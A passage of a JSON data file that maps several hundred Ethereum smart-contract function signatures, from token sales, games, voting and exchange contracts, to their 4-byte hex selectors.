"0x61ba3377", "WatchLastPayout()": "0xc9734ebd", "WatchFees()": "0x20bfec70", "WatchCurrentMultiplier()": "0x82381c96", "WatchCollectedFeesInSzabo()": "0xcf6b3822", "WatchBlockSizeInEther()": "0x252786e4", "WatchBalanceInEther()": "0xe0834ea4", "WatchBalance()": "0xd628e0a6", "WatchAppliedFeePercentage()": "0x5d5483b3", "walkTowardsBlock()": "0x655388be", "vote(uint256)": "0x0121b93f", "vote(uint256,address,bool)": "0xe2cdd42a", "vote(uint8)": "0xb3f98adc", "voteSuperQuorum(uint256,bool)": "0x0bf75567", "voteSuicide(address)": "0xf2561a43", "voteQuorum(uint256,bool)": "0x76e4ca0d", "votePrice(uint256,bool)": "0x23637e60", "voteOutMasterKey(address)": "0x901d7775", "voteInMasterKey(address)": "0x58ae8bcf", "voteForProposal(uint256)": "0x045c6ce0", "voteEmergencyWithdrawal(bool)": "0x187a62d5", "voteBoardProposal(uint256,address,bool)": "0x52a554a1", "voteAllowTransactions(bool)": "0x5f09952e", "Vote()": "0x6bf52ffa", "Visit()": "0x226685ee", "Videos()": "0x4228974c", "vetoPayout(uint256,uint256)": "0xe820a32f", "Vault(address,uint256)": "0xcc189d00", "valuePerShare()": "0xc0a239e3", "ValidetherOracle()": "0x8f7fe231", "validateProposedThroneRules(uint256,uint256,uint256,uint256,uint256)": "0xd22c391a", "validateProposedMonarchName(string)": "0x67fc1c6a", "validate_percent(uint8)": "0xb8d4efb5", "validateNameInternal(string)": "0x83f6d9a4", "usurpation()": "0xccf1ab9b", "userTokens(address)": "0xed498fa8", "userStats(address)": "0x8a65d874", "userRescues(address)": "0xe28fed1e", "userProfits()": "0x7b12df39", "userName(address)": "0xe6b972f5", "userId(address)": "0x376fe102", "UserDatabase(uint256)": "0xf597a499", "upgrade(address)": "0x0900f010", "updt(uint256,string,uint256,uint256,string,string,address)": "0xac7ffae3", "updateXIPFSPublicKey(string)": "0x1aa86370", "updateWithMPO()": "0x5a6c787e", "updateTxStats()": "0x1d4b0796", "updateTokenPriceWeekTwo()": "0x4ca7fbd0", "updateThingData(bytes32[],bytes32[],uint88)": "0xbc058968", "updateState(uint256,uint8,uint256)": "0x5dddea66", "updateRelease(uint32,uint32,uint32,bytes20,bool)": "0x645dce72", "LastProposalCanDiscard()": "0xcf866d6f", "discardRejectedProposal()": "0x0f8143f6", "handleLastProposal()": "0xba42fdb9", "pushProposal(address)": "0x8e955978", "updateMasternodeAsTeamMember(address)": "0x4e56925f", "getLastPerUser(address)": "0xa73c52e7", "deleteMasternode(uint256)": "0x00822599", "addMasternode(address)": "0x7d394f90", "isMasternodeOwner(address)": "0x9fc75354", "getContractType()": "0xc51a29e0", "getExpiry()": "0xf61c266b", "getTokenProposalDetails()": "0x08a1b574", "Zentum()": "0xa65a7753", "distributeALLY(address[],uint256,uint256)": "0x55a964a7", "AllyNetworkToken()": "0xe3049ded", "getBeneficiaries(address,address)": "0x5e7be40d", "insertBeneficiaries(address,address,uint256,uint256,uint256)": "0x4619c0ca", "setStubFund(address,address)": "0x6d5d21a9", "ReturnEthToEthero()": "0x21141de0", "removePromoCode(bytes32)": "0x324da66f", "addPromoCode(string,bytes32,uint256,uint8)": "0x1c423713", "calculateBonusAmount(address,uint256,bytes32)": "0x35a6ed92", "applyBonusAmount(address,uint256,bytes32)": "0x7f60bb7c", "removeDiscountStruct(uint256)": "0xf970bbfc", "addDiscountStruct(bytes32,uint256,uint256[2],uint256[],uint256[],uint256[])": "0x6660da77", "calculateBonus(uint256,uint256)": "0x6f72fd20", "removeDiscountPhase(uint256)": "0x87f29fdd", "addDiscountPhase(string,uint8,uint256,uint256)": "0x52c76de9", "calculateBonusAmount(uint256)": "0x81807a07", "getInvestorTokensPurchase(address,uint256)": "0xf7b6302e", "getInvestorTokensPurchasesLength(address)": "0x1b8689b6", "_refundTokensPurchase(address,uint256)": "0x5b2b0168", "refundAllInvestorTokensPurchases(address)": "0x9f1aa404", "refundTokensPurchase(address,uint256)": "0x2405d03e", "buyTokens(bytes32,address)": "0x62d176cb", "setMaxInvestorContributionInWei(uint256)": "0xb1afe96b", "setMinPurchaseInWei(uint256)": "0xf77a490d", "setCrowdsaleStartDate(uint256)": "0x58892f63", "lockBonusTokensClaim(uint256)": "0x9c5c53b3", "lockPurchasedTokensClaim(uint256)": "0x88a6cc53", "blockInvestor(address)": "0xbf947852", "bulkWhitelistInvestor(address[])": "0x19774b86", "whitelistInvestor(address,bool)": "0xe6dff3b4", "isBlockpassInvestor(address)": "0x849ae5ea", "getInvestorClaimedTokens(address)": "0xfba52ff1", "fitsTokensForSaleCap(uint256)": "0xda1a13ce", "cmctcybermovie()": "0x1221a071", "newRound(uint256,bytes32)": "0xd732a3fa", "managePID(uint256)": "0xf78d1c6a", "manageLink(uint256,uint256)": "0xdb3119bb", "manageKey(uint256,uint256,uint256)": "0xb516ce40", "getBIDList()": "0x4ead4771", "getBetInfoByID(uint256)": "0xcf53d630", "getRoundInfoByID(uint256)": "0xbbc6df30", "getPlayerByAddr(address)": "0xc8cfb032", "reveal(uint256,uint256,bytes32)": "0x61d49ea8", "buyLink()": "0xf7073490", "buyWithBalance(uint256,uint256,uint256)": "0xa1804e67", "buySome(uint256,uint256,uint256,uint256)": "0x63f6100d", "editBet(uint256,uint256,uint256)": "0x4baa39be", "openBet(uint256)": "0x6de0b375", "openFirstRound(uint256,bytes32)": "0x59c281da", "openNewBet(address,uint256,uint256)": "0xc77c00f8", "getMinutes(address)": "0xf2729d8a", "membersLength()": "0x0f027c67", "setMasterFeeContract(address)": "0xf03529c3", "isRegisteredAuthority(address)": "0x339282b7", "isRegisteredToFirm(string,address)": "0x339e2c45", "isRegisteredFirm(string)": "0xee5493b6", "getFirmFromAuthority(address)": "0xacca2c24", "setRegisteredAuthority(string,address,bool)": "0xf3f969a0", "setRegisteredFirm(string,bool)": "0x41ade6b7", "allowOwnership(address)": "0x4bbc142c", "setShouldBlockPublicTrade(bool)": "0x398b35b1", "setGameOperator(address)": "0xda46a73c", "CASHX()": "0x4c98aec9", "settleBet(bytes20,bytes20,bytes32)": "0xe163b75b", "setJackpotFee(uint256)": "0x4b24f3a6", "setJackpotModulo(uint256)": "0xcc6db55f", "setMinJackpotBet(uint256)": "0x3d74e856", "setHouseEdgeMinimumAmount(uint256)": "0x548f896c", "setHouseEdgePercent(uint256)": "0xcf96ce03", "getAuctionTimeLimits(bytes32)": "0x21355869", "getAuctionCost(bytes32,uint256)": "0x34e73f6c", "sendToken()": "0xb8972db5", "withrawDev()": "0xbd353ce2", "bytes32ToHex(bytes32)": "0x3df18e0a", "strcat(bytes,string,bytes,string)": "0x53dd1902", "getCloseAmounts(uint256,uint256,uint256)": "0x80959cb6", "getTokenAmountOnAdd(uint256)": "0x4f348b46", "close(address,uint256,uint256)": "0x481a3fc4", "setStateClosedIfClosed()": "0x2cea0654", "withdrawImpl(address,address)": "0xea9e372f", "closeUsingTrustedRecipient(address,address,uint256)": "0x9418b8a6", "getPositionDeedHolder(bytes32)": "0x47369a7c", "createTokenContract(address,bytes32)": "0x46ef6660", "LeapCoin()": "0x08f46b0a", "updateUserInvestBalance()": "0x048641be", "sendPayout()": "0x443d4c9c", "sendCommission()": "0x2449dd55", "Erc20Token(string,string,uint8)": "0xee295b32", "_resetTiles()": "0xaba13a2f", "_stalemateTransfer()": "0x09c99d10", "_endContestIfNeededStalemate()": "0xbaf4f6d1", "_endContestIfNeeded()": "0xc8b70559", "checkWinner(address)": "0x4d722c4c", "haveIWon()": "0xa2fbe98c", "timeLeftToBid(address)": "0x17d55d13", "TicTacPotato()": "0x3cb5d1df", "PiedPiperNetworkCoin()": "0x1f6de588", "clearCrowdsaleCloseTimer()": "0x0d051c52", "setCrowdsaleCloseTimerFor(uint256)": "0xe330a737", "clearCrowdsaleOpenTimer()": "0x6d6e2710", "setCrowdsaleOpenTimerFor(uint256)": "0x79d220ae", "isCrowdsaleActive()": "0x0118e686", "checkCloseTimer()": "0x1f4425f3", "checkOpenTimer()": "0xdd3260fc", "closeTimerElapsed()": "0x80f4531f", "openTimerElapsed()": "0xea663631", "MRVToken(address,address)": "0xe8a7be57", "setRamenContract(address)": "0xf460e5d0", "assignFundReceiver(address,uint256)": "0xd1632f67", "withdrawDividend()": "0x6a474002", "reinvestDividend()": "0xf03a5687", "donateETH()": "0x8b4c40b0", "FuckToken()": "0x3627d195", "ZJF()": "0x0f246780", "safeSubtrZJF(uint256,uint256)": "0x47b7142b", "getTotalLeaderboards()": "0xff29c104", "accessoryOnLeaderboards(uint64)": "0x43d6add1", "petOnLeaderboards(uint64)": "0xcaa774ed", "angelOnLeaderboards(uint64)": "0x0dbda70b", "verifyPosition(uint16,uint8,uint64)": "0xe0036d1d", "switchRankings(uint16,uint8,uint64,uint64,uint64,uint64,uint64,uint64)": "0xd34a412c", "newTeamOnEnd(uint16,uint64,uint64,uint64)": "0xdb9dfb35", "getLeaderboard(uint16)": "0x5007364f", "getTeamFromLeaderboard(uint16,uint8)": "0xfd7903a0", "setMedalsClaimed(uint16)": "0xa946d7bb", "closeLeaderboard(uint16)": "0xc95f79ba", "openLeaderboard(uint8,string)": "0x23a1e00e", "setMinMaxDays(uint8,uint8)": "0xecd57ec1", "fundICO(address)": "0xcd367936", "TweetherToken()": "0xfd52bdd5", "IQB()": "0xa2e55e88", "MeetToken()": "0xf8db188b", "MeetTokenBase()": "0x8c37ce04", "GDOAdv(uint256,string,string)": "0x090d5386", "GDO(uint256,string,string)": "0x28195d2c", "VertesCoin()": "0x0d9db3f1", "setTokenSaleRounds(uint256[5],uint256[5],uint256[5],uint256[5],uint256[5],uint256[5])": "0xd94929fe", "setAdmin(address,address)": "0xc55b6bb7", "disburseToken(address,address[],uint256[])": "0xacd02c30", "manualSendEther(address,address,uint256)": "0x447fbbe3", "isPreIco(uint256)": "0x414b85e4", "EtherFuture()": "0x741685e5", "LJCJ()": "0xa0566330", "spin(address,uint256)": "0xd37d753f", "fidget(address)": "0xb47c11e8", "icoActive()": "0x2aa073c5", "FidgETHSpinner()": "0x6eb5ebae", "littCapsuleGet(bytes32)": "0xf225138b", "littIsCapsule(bytes32)": "0x4b37cf47", "littPoolIDExists(uint256)": "0x0c1c0974", "littContentExists(bytes32)": "0x2d01564c", "getSubscriberContentHashes()": "0xbc65d6f6", "getSubscriberContentCount()": "0xbb42de92", "getSubscriberStatus()": "0x6c8d0b1e", "getSubscriberType()": "0x0fcbb5b9", "getPoolID()": "0x4dbddc18", "getPoolNameByID(uint256)": "0xbfdb8796", "getPoolName(uint256)": "0x0f76f489", "setPoolName(string,uint256)": "0xad979417", "getLittAdminCount()": "0x25697337", "getContentCount()": "0x74449ca4", "getClientCount()": "0x5a81018a", "modifyContentAccess(bytes32,bool,uint256)": "0x1f45ad5c", "getPoolAdmin(uint256)": "0x3553f60d", "changeAssignedAdmin(address,uint256,string)": "0x67efbab1", "setAssignedID(address,address,uint256,string)": "0x739294d2", "setDelegateAdmin(address,address,string,bool)": "0x659e69e9", "getLittafiContent(bytes32,uint256)": "0xd47637f7", "transferContentOwnership(bytes32,address,address,string)": "0xf186a625", "littafiTimeCapsule(bytes32,string,string,string,string,uint256)": "0x7ef0356a", "littafiContentCommit(bytes32,string,string,string,string,bool)": "0xe980c2e0", "subscribtionLittafi(uint256,string,string)": "0x8a349cc4", "tokenDistribution(address,uint256)": "0xde534744", "changeMinInvestment(uint256)": "0x13f56f73", "changeAdminCharges(uint256,uint256,uint256)": "0xa67ba5d2", "addToWhitelist(address,uint256)": "0x214405fc", "startPhase3(uint256)": "0x2c757eed", "startPhase2(uint256)": "0xba8fb567", "getTokenVolumebasedBonusRateForPhase3(uint256)": "0xfdc272fe", "getTokenVolumebasedBonusRateForPhase2(uint256)": "0x737377fe", "getTokenVolumebasedBonusRateForPhase1(uint256)": "0xbba7a1ab", "tokensaleToOtherCoinUser(address,uint256)": "0xd174c388", "getInvestorDepositAmount(address)": "0xaed76aa4", "failedWhitelist(address)": "0x365af466", "closeAfterWhitelisted(address)": "0xd8f06b52", "EscrowVault(address)": "0xc2a96ce5", "afterWhtelisted(address)": "0x2f109d2b", "isDrop(uint256,address)": "0x41f4fcaf", "send(address,address[],address,uint256[])": "0x0c7013c1", "hashLoop(uint256,bytes32)": "0x04336615", "delFromVestMap(address)": "0x84140c40", "addToVestMap(address,uint256,uint256,uint256,uint256)": "0xdb330794", "getBeneficialAddress()": "0x277b8ffc", "LBA()": "0x14cf588f", "getReleaseBlock(address)": "0xee19a7fc", "getLockAmount(address)": "0x399d6465", "XBlockToken()": "0x637cc5c6", "evolveByAtom(uint256)": "0x0e47c259", "buyByAtom(uint256)": "0xedc48941", "rentByAtom(uint256,uint256)": "0x3154d790", "autoRentByAtom(uint256,uint256)": "0x415c7593", "unsetIsBuyByAtom(uint256)": "0xbee4bbeb", "unsetIsRentByAtom(uint256)": "0xfa8ad6b9", "setIsBuyByAtom(uint256,uint128)": "0x42bd0959", "setIsRentByAtom(uint256,uint128)": "0x39e65b46", "setLevelup(uint8[4])": "0xb79ec028", "setFee(uint128)": "0x3687f24a", "setGiftMode(bool)": "0xd12892e4", "setPauseMode(bool)": "0xeab2d378", "createRandomAtom()": "0xaa17973c", "CaData()": "0x80496fd6", "CTT()": "0x76309e70", "ETbankWord()": "0xe66623ad", "emitEvent(string)": "0x982296a8", "testnetWithdrawn(address,uint256)": "0x3af946d2", "_calculateCurrentPrice(uint256,uint256,uint256,uint256)": "0x9a9249a8", "_calculateFee(uint256)": "0xa1cd150d", "setAuctionPriceLimit(uint256)": "0xcf7c2985", "applyHotFix(address)": "0x05e4438a", "getNonEtherController()": "0x106259c8", "setNonEtherController(address)": "0xe8a21157", "getFinishTime()": "0xafc01cb9", "internalBuy(address,uint256,bool)": "0xa941be3c", "nonEtherBuy(address,uint256)": "0xdd5df59c", "init(address,address,uint256)": "0x86863ec6", "BoomstarterICO(address[],address,uint256,bool)": "0x19e3a1d8", "estimateTokensWithActualPayment(uint256)": "0x44830788", "invested(address,uint256)": "0x8a35b8c7", "FundsRegistry(address[],uint256,address,address)": "0xa23da130", "detachControllerForever()": "0xebc46fdb", "isSaleActive()": "0x564566a8", "purchasedTokenBalanceOf(address)": "0x5aa037dc", "withdrawMicroDivs()": "0x725da7b4", "buyTokensWithProperEvent(address,uint8)": "0x5fc2cb39", "Medban()": "0xe43aa5ff", "YCStandardToken(uint256,string,uint8,string)": "0x4e80f241", "CORENETCOIN(uint256,string,uint8,string)": "0xa4bf594b", "batch(uint256[],address[])": "0x70590ca2", "transferfromOwner(address,uint256)": "0x63506c16", "deployTokens(uint256[],address[])": "0x9442fad9", "GetPrice()": "0x6d90164e", "ownedfunction()": "0xda49613c", "canPay()": "0x1cfe04a7", "Hawaii()": "0xd571a9a9", "CloutToken(uint256,address)": "0x45176f8d", "makePlayerID(address)": "0x959c265b", "isNewPlayer(address)": "0xa2e7223e", "registerNameCore(uint256,bytes32)": "0x15454cd2", "registerNameXname(string,bytes32)": "0x0e07ef81", "registerNameXaddr(string,address)": "0x27d87924", "registerNameXID(string,uint256)": "0xf32306d2", "ExiliumToken()": "0x9a3a8c85", "IDRT()": "0x1da2d92b", "posstoken()": "0x4e458eb6", "SocialBlock()": "0x3080b9c7", "withdrawLeftTokens()": "0x225c5567", "addInvestor(address,uint256,uint256)": "0xced84a71", "BusTokenLock(address,address)": "0xa817163b", "BusToken()": "0x76814692", "XPS()": "0x40f5ed88", "removeVerified(address,address)": "0xba0e6cc9", "addVerified(address[])": "0x6bbbc182", "setLimitTokenPurchase(uint256,uint256)": "0xbe3c92a6", "enableCrowdsale()": "0x349c1ee3", "releaseLockAgencyLock2()": "0x14be5169", "releaseLockAgencyLock1()": "0x1c878c97", "checkToken()": "0xcac3e64a", "Unity3d()": "0x0487b7e9", "potSwap(uint256)": "0xa42ef788", "OrangeCirculateChain()": "0x0e4c3aa6", "send(address,address,address[],uint256[])": "0x96e0ef33", "AZExchange(address,address,address,uint256,uint256,uint256)": "0x32bc873d", "dexjartoken()": "0x15b3433b", "totalRaised()": "0xc5c4744c", "confiscate(address)": "0x44f252a0", "unQuarantineAddress(address)": "0x121e8122", "quarantineAddress(address)": "0x7e42be1a", "ChinaInvestmentToken(uint256,string,uint8,string)": "0x10f444ac", "Futurescoin()": "0x66e144f9", "WhaleChain(uint256,string,uint8,string)": "0x1101fa06", "determineNextRoundLength()": "0xa8c65126", "DiscardToken()": "0xef284d8f", "roundClaimICOKeys(uint256)": "0x8f80d339", "calcPlayerICOPhaseKeys(uint256,uint256)": "0x75661f4c", "calcAverageICOPhaseKeyPrice(uint256)": "0xdcb6af48", "getPlayerVaultsHelper(uint256,uint256,uint256,uint256,uint256)": "0x54bef3b4", "VOCToken()": "0x187958ac", "certifiedPartner()": "0xebb6b338", "ELIXAddress()": "0x5945841b", "BTL_SPARTAN()": "0x636ce4d7", "maxAmmount()": "0x62d3b5c5", "nextDraw()": "0x1f167829", "presaleclosingTime()": "0x9d652118", "STRIKE_PRICE()": "0x62e888bb", "lockedCore()": "0x2163d49a", "tokensDevelopers()": "0xc53fc65f", "napoleonXAdministrator()": "0xe46d1939", "developerAddr()": "0x33b6baf5", "scale()": "0xf51e181a", "investedETH()": "0x9ba4d4ee", "lastInterestCycle()": "0x52a5b002", "requiresHardCap()": "0x03f3cea1", "STARTING_BAT()": "0x9b276964", "cycleCount_()": "0xf3f458f8", "percentWeiDividend()": "0x3efe54d4", "OpenGift()": "0xbf8b7ec2", "stopWhitelistReservetion()": "0x01bbc3f5", "wrappedContract()": "0xf7f9cb1c", "unLockIdx()": "0xd1ce36aa", "firstWavePrice()": "0x7008a4a3", "rootDomain()": "0x40ff38b2", "tokenNeedForBonusLevel0()": "0x2fb556f7", "evaluation_stage_block_size()": "0x2e2a6488", "MAX_CONTRIBUTION_SLOTS()": "0x758fabcd", "crowdSaleStarted()": "0x6cea50a1", "benWallet()": "0xd3a6c234", "commissionPoints()": "0x56eaf1c0", "COLOR_YELLOW()": "0xb5d1aedc", "stageBonus()": "0x1e6d4180", "totalPostIcoContributorIdsAllocated()": "0x1bf2a90a", "gimmeEtherr()": "0x4cd18a83", "individualMaxCapTokens()": "0x1fe00a15", "hardCapTxWei()": "0x387ed59b", "tgeLive()": "0x3237d63c", "bltRetainedAcc()": "0xa096ea1b", "bountiesAllocAddress()": "0x66b625d4", "VESTING_PERIOD()": "0x0197d972", "yearteam()": "0x1d4ac2b6", "tokenCapForPreICO()": "0xcdd739f6", "lifeReserveAllocation()": "0x2c54357f", "presaleMaxValue()": "0xefb588e4", "startCrowdsalePhase2Date()": "0x29a64dd1", "thirdRelease()": "0xa777deca", "ALLOC_ECOSYSTEM()": "0xe4fae421", "startSecondPhase()": "0x76456887", "charityDonation()": "0xd1c8e7e6", "totalMessages()": "0x951166c0", "RATE_THRESHOLD_PERCENTAGE()": "0x3fdbb6c7", "_bountySupply()": "0xc1aaa717", "gameHostAddress()": "0x02978be8", "checkAddressVerified()": "0x076804b8", "mintingIsFinished()": "0x37c75992", "approveWithdrawAddress()": "0xbdd50908", "tokenCapped()": "0xde5dc6c8", "icoBeginDate()": "0x96c5ea93", "oldAppreciationRateWei()": "0x201f6e02", "PRESALE_END_TIMESTAMP()": "0x99110d3c", "STEP_SIZE()": "0x4e761a91", "MINIMUM_BET_VALUE()": "0xf915cf42", "DevMiningRewardPerETHBlock()": "0x1a5f9613", "amount4()": "0x59118ff2", "withdrawFinal()": "0x9ebb1250", "NewRisk()": "0x199f4045", "cooAddress1()": "0xa9b7c3bf", "collectedFees()": "0x9003adfe", "distributedBountyStakes()": "0x5babe01b", "_founder_one()": "0x8a17041a", "icoEnd()": "0x0563451a", "amountRised()": "0xc892cfdf", "_totalTokens()": "0x6956f3d5", "pauseRoundC()": "0x589b88bd", "MAX_INVESTORS()": "0x6a34480b", "unsoldTokensAmount()": "0x50df7eb4", "MAX_TOKEN_GRANTEES()": "0x91f5f3c9", "DICE_LOWER()": "0xa0dfc61f", "getAmountRegistered()": "0xb242c9c3", "Jekyll_Island_Inc()": "0x21ec5981", "potato()": "0xf8dcc9a9", "m_orderCount()": "0x69c7c180", "TAAS_VAULT()": "0x20b1d054", "mvpLaunchedAt()": "0xe1e46351", "total_raised()": "0x9308a865", "RESERVE_FUND()": "0x5c473764", "PatronTwoWithdrawal()": "0x62612c6d", "MAX_TOKENS_SALE()": "0x0be96fbd", "withdrawOwnerAmount()": "0x929f11ea", "base_token_is_seeded()": "0xfbd4200c", "tokenTicketPrice()": "0xb93529bc", "show_me_the_money()": "0xc567e43a", "BONUS_DURATION_2()": "0x33a7d2e3", "Standard_1()": "0x9eee5787", "ENTRY_FEE()": "0xf6d361cc", "stageBegin()": "0x65766b64", "for_rewards()": "0xe0bab523", "getCountTempHolders()": "0xdc787bba", "delegate()": "0xc89e4361", "feePot()": "0x4c9f66c7", "BountyCampaingWallet()": "0x89fe253a", "onwerfee()": "0x29143bdd", "isGenesMarket()": "0x73a699ad", "commissionWallet()": "0x97c0262a", "currentPreICObalance()": "0xfe23b262", "_MAXIMUM_TARGET()": "0x87a2a9d6", "PRESALE_LEVEL_2()": "0x733b679e", "allFundingProcessed()": "0xe91ccdc0", "nullified()": "0xf9df65eb", "releaseContract()": "0xc71ddb9f", "PoolICO()": "0x2030762a", "ALLOC_ADVISOR()": "0xcec77ad5", "currentRoundStart()": "0x222d7e34", "mainWeiRaised()": "0x9458434f", "burnFeeFlat()": "0x0b8e845a", "LockChainFundDeposit()": "0x24457036", "devFeeBalance()": "0x5a0753ac", "jingZhiManager()": "0x5000a443", "locationId()": "0xe8aadc3f", "carsGifted()": "0xcf76ebf9", "reservedWei()": "0x182f67a3", "secondTTaxAmount()": "0x1ca84efc", "distributedReservedTokensDestinationsLen()": "0xc71a7aea", "ownershipTransferCounter()": "0x096aadce", "contractEnable()": "0xd5235a04", "addressOfTokenUsedAsReward4()": "0x07415ce8", "saleHasFinished()": "0x74c06f5d", "TEAM_TOKENS_PERCENT()": "0xd48e6a1b", "totalTokensICO1()": "0xd472fe7e", "fundBounty()": "0xe6512ea2", "fundingMaxCapInWei()": "0x44a71bc6", "actionCount()": "0x29da5738", "registeredToken()": "0x62eb6da1", "preSale()": "0x5a7adf7f", "AgreementUrlEn()": "0xa2200fbe", "fundariaBonusFundAddress()": "0xfc1c32fa", "ICO_PERCENTAGE_1()": "0xce72a696", "bids_sorted_refunded()": "0x4273bc59", "revokeAddress()": "0xa38ce2b4", "vc3Wallet4Pct()": "0xdef1a2da", "punksRemainingToAssign()": "0xc0d6ce63", "bountyProgram()": "0xc69fbf48", "decimalsMultiplier()": "0xbb13245f", "investorsTotal()": "0x1cb252fe", "tierOnePurchase()": "0xe6917e67", "ICO_DAYS()": "0xfde9683d", "ERC721_RECEIVED()": "0xecc98ce4", "weiMaxInvestment()": "0xba0bf0c4", "CertID()": "0x31e8c7ba", "pendingJackpotForHouse()": "0xd95374ce", "lastBlock_v10Hash_uint256()": "0x8f2c3af8", "tradeDealRequested()": "0x9766178c", "unitMythGrowth()": "0x150bc419", "Restart()": "0x357af806", "allTimePlayers()": "0x2ef5c784", "block02w()": "0x4f8c2a8a", "totalContributionInWei()": "0xdc6bbdf5", "matchDay()": "0xb3d62a25", "CardCount()": "0xe81b3c88", "licenseSalesContractAddress()": "0x9216cf13", "vanbexTeamVestingPeriod()": "0x284e650a", "aVideoCost()": "0xe04fac0c", "securityAudit()": "0xdf054797", "BASalesPrice()": "0x58e3815c", "totalPaymentsHeld()": "0x2c638806", "deathData_a13()": "0x6dde33ea", "minContributeETH()": "0x0754236d", "foundersVault()": "0xbbf58f4d", "lastTransactionReceivedInWei()": "0xd9f8a3c3", "tokenRegistry()": "0x9d23c4c7", "Ownable2()": "0x8baf612f", "xapo()": "0xb8b040a1", "commFoundAddr()": "0xffb92678", "vestingDuration()": "0x1514617e", "totalSellCardNumber()": "0xa8d99045", "ctoAddress()": "0x1f513660", "filehash()": "0x6bb1605b", "FREE_SUPPLY()": "0x9858cf19", "districtsCore()": "0x757501c5", "icoStartTimestampStage3()": "0x2c0f13a7", "weiRaiseLimit()": "0x8ac1a8d6", "votingOpen()": "0xa95824b4", "tokensClaimedAirdrop()": "0x615ef639", "allSet()": "0x292d98cd", "totalBuyOrders()": "0x11e67c57", "nextContributorToReturn()": "0x298aa634", "purchaseRecordsNum()": "0xb8500e5e", "saleStage()": "0x4aaca86d", "foundersWallet2()": "0x591a0d87", "sentPreSaleTokens()": "0x5d2a5d3d", "REFERRAL_BONUS_LEVEL3()": "0x7788d126", "minPreContribution()": "0xd9caaada", "_restriction()": "0x065ec2e6", "airDropShadowMoney()": "0xcb58594e", "promoTypeNum()": "0xa77ee38c", "FOUNDER_ONE()": "0x3693db0a", "icoOpen()": "0x927a90da", "nLuckyVoters()": "0xb6307f0e", "emergencyAdmin()": "0x70905dce", "weiMaximumLimit()": "0xaa5581ef", "setLiquid0(bool)": "0xa70a92f7", "setMetadata0(string)": "0x5ff97818", "withdrawDirectDebit(address[],bool)": "0x712c0c5a", "withdrawDirectDebit(address)": "0xb39e1c6c", "terminateDirectDebit(address)": "0x0ade7142", "directDebit(address,address)": "0x40086aa0", "delegateTransferAndCall(uint256,uint256,address,uint256,bytes,address,uint8,bytes32,bytes32)": "0x9d44d93b", "increaseNonce()": "0xc53a0292", "nonceOf(address)": "0xed2a2d64", "transfer(uint256[])": "0xb5e36417", "spendableAllowance(address,address)": "0x5d71cf46", "setERC20ApproveChecking(bool)": "0x19261e6f", "decreaseAllowance(address,uint256,bool)": "0x24a73e5f", "increaseAllowance(address,uint256)": "0x39509351", "isApproved(bytes32,uint256,bytes)": "0xc3662528", "isAuthorized(address,address,bytes)": "0x0a85bb25", "mulDivCeil(uint256,uint256,uint256)": "0xca7390ab", "mulDiv(uint256,uint256,uint256)": "0xaa9a0912", "toBytes(address,address)": "0xfcb94dbb", "isAccount(address,address)": "0x435ce40a", "isValid(address,address)": "0xaf874a76", "XCCCrowdsale(address)": "0x73668b06", "SPOT9()": "0x41be0a14", "withdrawPRSTokens(address)": "0x2ae8636d", "enablePurchasing(bool)": "0xe10d416f", "BitAirToken(address,string,string,uint256,uint256)": "0xd01a9453", "GQHToken(uint256,string,uint8,string)": "0x11ce3d2c", "random(uint64)": "0x1a1a7993", "SYCC()": "0x5100db6f", "eTimesChain()": "0x6ff36340", "BillofLaden()": "0x8e76e3ba", "OilToken(string,string,uint256)": "0x395764ff", "getAddrForPrivilege(address)": "0x9cdfa3df", "setAddrForPrivilege(address)": "0x1308c324", "releasePrivilege()": "0x49480bc1", "YetAnotherUselessToken()": "0x481ed14c", "changeDeveloperSENSDestinationAddress(address)": "0x9362e50e", "changeDeveloperETHDestinationAddress(address)": "0xb5ef06d0", "SENSToken(address,address,uint256,uint256)": "0xf36706cb", "issueTokenAndTransfer(uint256,address)": "0x8347a0d1", "getNewToken(uint256)": "0x480184a9", "setToContractAddr(address)": "0x9ff652cb", "setFromContractAddr(address)": "0x070c04b1", "Convert()": "0xc5af9000", "USBEEF()": "0x022e1e59", "createProduct(bytes32,uint128)": "0x958a9937", "ConfToken()": "0x563ad62b", "getExtraBonus()": "0xfce846e8", "setExtraBonus(uint256)": "0xf1bab09c", "getIcoCap()": "0x4cb84b9a", "setIcoCap(uint256)": "0xb4d00d94", "BGToken()": "0xb2c1d7dc", "YSSYBToken(uint256,string,string)": "0xb569a35f", "POMACOIN()": "0x8e1e3e6c", "DTCC_ILOW_5()": "0x9717ae9d", "assertCompareBalance(uint256,uint256)": "0xb2141ba4", "assertOrders(address,bytes32)": "0xb55e31f4", "assertToken(address)": "0x07f4f3f4", "assertPause()": "0x6a6ae271", "assertQuantity(uint256)": "0x66b847e5", "tradeBalances(address,address,uint256,uint256,address,uint256,bytes32)": "0x796736f0", "trade(address,address,uint256,uint256,uint256,address,uint256)": "0x354709dd", "orderCancel(address,uint256,address,uint256,uint256)": "0x7b28aa4c", "order(address,uint256,address,uint256,uint256)": "0x5ae11d5d", "setFeeTake(uint256)": "0x90f098bb", "setFeeAccount(address)": "0x4b023cf8", "setOrderEnd()": "0x33b37915", "setNextVersionAddress(address)": "0xf0adda7d", "CCH_FGRE_1()": "0x1a81284b", "GagarinToken()": "0x7f1926c7", "GAGARIN()": "0xac171101", "LendingLiquid()": "0xa58b2e43", "calculateTransferValue(uint256,uint256)": "0x03f166de", "tokenIsComponent(address)": "0x18c53aca", "getUnredeemedBalance(address,address)": "0x38c7db75", "getUnits()": "0x027aa9f5", "getComponents()": "0x99d50d5d", "redeemExcluded(bytes32)": "0x15698812", "partialRedeem(uint256,bytes32)": "0xb5d65f61", "hasValue(address[],address)": "0x469ef000", "DHAMAR()": "0xcdb230be", "MANHATTANPROXYLEXINGTONAVE()": "0x7f79cbfe", "refundPreICO()": "0xe591253c", "recoverLeftoversPreICO()": "0x4dbaa16b", "preICOBuy()": "0x6498156e", "calculateAmountBoughtPreICO(uint256)": "0x37d3433f", "transferPreICOCollected()": "0xb20a8779", "HardcodedCrowdsale(uint256,uint256,uint256,uint256,address)": "0x517f6c51", "RetailLoyaltySystemToken()": "0xe74ac94a", "RetailLoyaltySystemBase(uint256,string,string,uint8)": "0x6b6b2740", "whiteListERC223(address)": "0xc58d96a5", "blackListERC223(address)": "0x3470b833", "whiteListERC20(address)": "0xde346a40", "blackListERC20(address)": "0xd288c878", "EthereumAI(address)": "0x6183c5d6", "RaisrToken()": "0x6365dfd9", "EplusCoinToken()": "0x7a04855a", "convertToRate(bytes32)": "0x118aa5a1", "validRate(uint256)": "0x49a742eb", "zzz()": "0xa4dff0a2", "distributeIQTTokenBatch(uint256)": "0xd8ca8a55", "distributeIQTToken()": "0x69997987", "withdrawIQT(uint256)": 